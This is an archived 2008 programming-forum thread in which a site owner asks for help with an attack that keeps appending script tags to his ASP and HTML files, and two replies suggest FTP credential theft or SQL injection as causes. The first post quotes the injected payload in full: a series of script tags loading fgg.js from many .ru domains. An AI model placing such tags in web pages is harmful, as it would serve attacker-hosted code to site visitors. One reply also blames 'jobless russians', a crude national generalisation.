Wrox Programmer Forums
| Search | Today's Posts | Mark Forums Read
Classic ASP Professional For advanced coder questions in ASP 3. NOT for ASP.NET 1.0, 1.1, or 2.0.
Welcome to the p2p.wrox.com Forums.

You are currently viewing the Classic ASP Professional section of the Wrox Programmer to Programmer discussions. This is a community of software programmers and website developers including Wrox book authors and readers. New member registration was closed in 2019. New posts were shut off and the site was archived into this static format as of October 1, 2020. If you require technical support for a Wrox book please contact http://hub.wiley.com
 
Old July 23rd, 2008, 04:14 AM
Authorized User
 
Join Date: Jul 2007
Location: chennai, Tamilnadu, India.
Posts: 10
Thanks: 0
Thanked 0 Times in 0 Posts
Default Hacking in my website


Dear Sir,

 I have a asp website in online. It is working very fine before two weeks. But now some one hacking my website regularly. They insert a <script> tag in at the bottom of my all source files like .asp,.html files. I dont know how they are inserting code in my source file with out knowing my FTP passwords. I am thinking these problem came by hacking. I am very much confusing about that. Please give a solution for this problem. Please Help me. I pasted the script tag by which is inserted in my source file below


<script src=http://www.lkc2.ru/fgg.js></script><script src=http://www.kc43.ru/fgg.js></script><script src=http://www.iogp.ru/fgg.js></script><script src=http://www.lodse.ru/fgg.js></script><script src=http://www.ecx2.ru/fgg.js></script><script src=http://www.nudk.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.iogp.ru/fgg.js></script><script src=http://www.sslwer.ru/fgg.js></script><script src=http://www.ecx2.ru/fgg.js></script><script src=http://www.sdkj.ru/fgg.js></script><script src=http://www.iogp.ru/fgg.js></script><script src=http://www.d5sg.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.sslwer.ru/fgg.js></script><script src=http://www.gb53.ru/fgg.js></script><script src=http://www.iogp.ru/fgg.js></script><script src=http://www.keec.ru/fgg.js></script><script src=http://www.kc43.ru/fgg.js></script>


 
Old August 17th, 2008, 10:14 PM
Registered User
 
Join Date: Aug 2008
Location: , , .
Posts: 2
Thanks: 0
Thanked 0 Times in 0 Posts
Default

Donot save passwords in your ftp client. Login everytime if you want to upload any files to the server. If you are using any warez clients i recommend you to uninstall it coz they steal the ftp password even though you change it. Probaly any of the trojans in ur system could steal the password.

Clean up all your site codes and upload them again.

Make the default file of your site to be read only.

You could also change the home page file to be someothername.asp someothername.html. just redirect from the default.asp

Just google IFRAME ATTACK DOS ATTACK to get more information

All these nuisance are caused by jobless russians.

"Raise Shields charge phasers..."

malarcodes


 
Old November 21st, 2008, 12:46 AM
Authorized User
 
Join Date: Feb 2006
Location: jaipur, rajasthan, India.
Posts: 67
Thanks: 7
Thanked 0 Times in 0 Posts
Send a message via Yahoo to beetle_jaipur
Default

Hi

are you using any database like sql server, ms-access, then this may the problem of sql injection.

i have faced the same problem last month.
if you want to read more about this you can see the complete listing at
http://p2p.wrox.com/topic.asp?TOPIC_ID=73591

in my opinion, if you are using any database, and storing links to your database then it is possible inject code into your database without knowing your ftp account or connection details.

just check your code where proper validation is not done.









Similar Threads
Thread Thread Starter Forum Replies Last Post
Uploading a Website Manoj Bisht ASP.NET 2.0 Professional 1 May 24th, 2008 10:48 AM
How can I use workflow with website? Jihad Windows Workflow 0 March 13th, 2008 04:47 PM
all about website benny HTML Code Clinic 2 February 11th, 2008 04:49 AM
Hacking TBH website. kherrerab BOOK: ASP.NET 2.0 Website Programming Problem Design Solution ISBN: 978-0-7645-8464-0 5 October 10th, 2007 02:26 PM
Dynamic website to Static website Aboal3ood ASP.NET 1.x and 2.0 Application Design 4 December 7th, 2006 11:46 AM





Powered by vBulletin®
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.
Copyright (c) 2020 John Wiley & Sons, Inc.